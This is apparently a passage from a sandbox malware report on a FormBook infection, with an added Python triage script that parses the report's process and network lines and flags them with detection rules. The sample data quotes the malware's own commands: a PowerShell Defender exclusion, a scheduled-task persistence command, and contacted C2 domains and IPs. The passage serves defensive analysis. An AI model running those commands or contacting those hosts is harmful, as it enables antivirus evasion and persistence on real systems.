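The process-creation chain above (EQNEDT32.EXE spawning vbc.exe from C:\Users\Public, vbc.exe spawning powershell.exe with Add-MpPreference and schtasks.exe with an XML from the user's Temp folder) and the network activity attributed to explorer.exe are exactly the events the report's Sigma signatures key on. The block below is an added example, not code from the Joe Sandbox report: a small Python triage script that parses the report's own "Process created", "Domain query" and "Network Connect" lines (the constructed sample copies the lines shown above, with command-line quotes restored) and applies rules named after those signatures. The suspicious-folder list and the set of system processes are narrow assumptions, and explorer.exe does legitimately reach the network on a real host, so that rule needs a baseline before it drives alerting. Two practitioner notes: the path excluded from Defender (nLOlOTZpUHFzC.exe under Roaming) shares its name with the scheduled task Updates\nLOlOTZpUHFzC, so the two artefacts should be hunted together; and FormBook configurations carry many domains of which only some are live C2, so the extracted domains are candidates to verify rather than a confirmed C2 list.

```python
"""Rule-based triage of Joe Sandbox behaviour lines (added example, not report code)."""
import re
from collections import Counter
from dataclasses import dataclass
from pathlib import PureWindowsPath

# Constructed sample input: the report's own process-creation and network lines,
# with the command-line quotes restored where extraction dropped them.
REPORT_LINES = [
    r'Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"',
    r'Source: C:\Users\Public\vbc.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\nLOlOTZpUHFzC.exe"',
    r'Source: C:\Users\Public\vbc.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nLOlOTZpUHFzC" /XML "C:\Users\user\AppData\Local\Temp\tmp5580.tmp"',
    r'Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe',
    r'Source: C:\Windows\explorer.exe Domain query: www.digipoint-entertainment.com',
    r'Source: C:\Windows\explorer.exe Network Connect: 108.167.189.66 80',
    r'Source: C:\Windows\explorer.exe Domain query: www.hacticum.com',
    r'Source: C:\Windows\explorer.exe Network Connect: 192.0.78.25 80',
]

# "Source: <acting process> <event kind>: <payload>"; the acting process path may contain spaces.
LINE_RE = re.compile(
    r"^Source: (?P<source>.+?) (?P<kind>Process created|Domain query|Network Connect): (?P<rest>.*)$"
)
# Payload of 'Process created' is "<image path> <command line>"; every image in this report ends in .exe.
IMAGE_RE = re.compile(r"^(?P<image>.+?\.exe)\s+(?P<cmdline>.*)$", re.IGNORECASE)

# Assumptions, kept deliberately narrow: directories a user-level dropper writes to, and
# system binaries that should not originate DNS/HTTP unless code was injected into them.
SUSPICIOUS_DIRS = ("c:\\users\\public\\", "\\appdata\\local\\temp\\")
SYSTEM_PROCESSES = {"explorer.exe", "svchost.exe"}


@dataclass(frozen=True)
class Event:
    source: str          # process that performed the action (the parent, for 'Process created')
    kind: str
    image: str = ""      # created process image ('Process created' only)
    cmdline: str = ""
    target: str = ""     # domain, or "ip port" ('Domain query' / 'Network Connect')


@dataclass(frozen=True)
class Alert:
    rule: str
    source: str
    detail: str


def parse_line(line):
    """Return an Event for a recognised behaviour line, or None for anything else."""
    m = LINE_RE.match(line)
    if not m:
        return None
    source, kind, rest = m.group("source"), m.group("kind"), m.group("rest")
    if kind != "Process created":
        return Event(source, kind, target=rest.strip())
    im = IMAGE_RE.match(rest)
    if not im:
        return None
    return Event(source, kind, image=im.group("image"), cmdline=im.group("cmdline"))


def basename(path):
    return PureWindowsPath(path).name.lower()


def evaluate(ev):
    """Apply the rules to one event; rule names follow the Sigma signatures the report lists."""
    alerts = []
    src = basename(ev.source)
    if ev.kind == "Process created":
        img, img_path, cmd = basename(ev.image), ev.image.lower(), ev.cmdline.lower()
        if src == "eqnedt32.exe":  # Equation Editor has no legitimate reason to spawn children
            alerts.append(Alert("Droppers Exploiting CVE-2017-11882", ev.source, ev.image))
        if any(d in img_path for d in SUSPICIOUS_DIRS):
            alerts.append(Alert("Execution from Suspicious Folder", ev.source, ev.image))
        if img == "powershell.exe" and "add-mppreference" in cmd and "-exclusion" in cmd:
            alerts.append(Alert("Powershell Defender Exclusion", ev.source, ev.cmdline))
        if img == "schtasks.exe" and "/create" in cmd and "\\appdata\\local\\temp\\" in cmd:
            alerts.append(Alert("Suspicious Add Task From User AppData Temp", ev.source, ev.cmdline))
    elif src in SYSTEM_PROCESSES:
        alerts.append(Alert("System process connects to network", ev.source, f"{ev.kind}: {ev.target}"))
    return alerts


def analyze(lines):
    events = [ev for ev in map(parse_line, lines) if ev is not None]
    return [a for ev in events for a in evaluate(ev)]


def summarize(alerts):
    """Hit count per rule, the view a triage analyst reads first."""
    return Counter(a.rule for a in alerts)


def extract_iocs(lines):
    """Domains and IPs contacted by a system process, as sorted lists of candidates to verify."""
    domains, ips = set(), set()
    for ev in filter(None, map(parse_line, lines)):
        if ev.kind == "Domain query":
            domains.add(ev.target)
        elif ev.kind == "Network Connect":
            ips.add(ev.target.split()[0])
    return sorted(domains), sorted(ips)


if __name__ == "__main__":
    found = analyze(REPORT_LINES)
    for rule, n in summarize(found).items():
        print(f"{n:2d}  {rule}")
    print(extract_iocs(REPORT_LINES))
```

Run against the constructed sample, the script raises nine alerts: one for the Equation Editor child, two for execution from C:\Users\Public, one each for the Defender exclusion and the Temp-sourced scheduled task, and four for explorer.exe network events. The same parser works on a full report export because every behaviour line follows the "Source: ... <kind>: ..." shape; lines of other kinds are ignored rather than mis-parsed.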

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device
Source: C:\Users\Public\vbc.exe Queries volume information: C:\Users\Public\vbc.exe VolumeInformation
Source: C:\Users\Public\vbc.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\Public\vbc.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation (5 entries)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation (2 entries)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation (2 entries)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation (2 entries)
Source: C:\Users\Public\vbc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected FormBook
Source: Yara match File source: 9.0.vbc.exe.400000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.vbc.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.vbc.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.vbc.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.vbc.exe.400000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000A.00000000.480207379.0000000009780000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.495167192.00000000000F0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000000.461391502.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.660726182.0000000000080000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.660761773.0000000000170000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000000.461058608.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.495256072.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.466306106.0000000003456000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.660793447.00000000001D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.495227557.0000000000210000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000000.487261064.0000000009780000.00000040.00020000.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected FormBook
Source: Yara match File source: the same 18 unpacked-PE and memory matches listed under Stealing of Sensitive Information above